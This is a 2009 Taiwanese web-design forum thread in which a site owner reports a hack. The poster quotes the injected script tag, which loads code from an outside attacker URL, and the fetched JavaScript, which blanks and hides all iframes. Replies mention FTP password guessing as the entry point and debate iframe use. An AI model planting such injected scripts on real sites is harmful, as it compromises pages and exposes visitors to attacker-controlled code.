作者ot32em (reverse(wasefo);)
看板Web_Design
標題[閒聊] 最近被HACKED 只因為加了 iframe...
時間Tue Nov 3 15:53:18 2009
最近我社團的網站被駭進去
然後十幾頁網頁都被加了
<script src=
http://anzantra.se/gastboken/b-one-default.php ></script>
內容是以下的CODE
感覺是 反iframe人仕入侵...
<script>
function M2Cx(){
var a=document.getElementsByTagName('ifr'+'ame'),
s='about:blank',
b;
for(var i=0;i<a.length;i++)
if((b=a[i]).src!=s){
b.src=s;
b.style.display='none';
b.onload=function(){this.location=s}}
if(!(--gEZ))
window.clearInterval(QKh)
}
gEZ=60000;
M2Cx();
QKh=window.setInterval('M2Cx()',1);
//iframes are EVIL! Hate Zeus!
</script>
function M2Cx(){
var a=document.getElementsByTagName('ifr'+'ame'),
s='about:blank',b;
for(vari=0;i<a.length;i++)
if((b=a[i]).src!=s){
b.src=s;b.style.display='none';
b.onload=function(){this.location=s}
}
if(!(--gEZ))window.clearInterval(QKh)
}
gEZ=60000;
M2Cx();
QKh=window.setInterval('M2Cx()',1);
有最近有跟我一樣的狀況嗎T.T
他還在smarty上動手腳
我在tpl裡debug好久跟白痴一樣...
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 140.115.50.29
→ ybite:網址請拿掉 囧 11/04 04:27
推 fet0124:我是FTP密碼被猜中 然後被植入第一行的程式碼 11/04 17:15
→ fet0124:正確來說是本文第三行(? 網址是不一樣的就是 11/04 17:15
→ ot32em:網址只是iframe移除的JS CODE.... 應該還好 11/04 19:39
推 zhengyao:請問iframe為什麼會被反呀? 安全性? 多線程難控制? 11/05 08:58
→ ot32em:W3C 基本教義派!? 11/05 16:04
→ robert38:要看你檢查哪一種吧...XHTML 1.0 Strict應該是過不了 11/06 09:58
→ robert38:基本上XHTML 1.0 Strict也不支援iframe 11/06 09:59
推 zhengyao:frameset好像都要自成一頁,或是自己做特殊dtd檔...... 11/06 21:56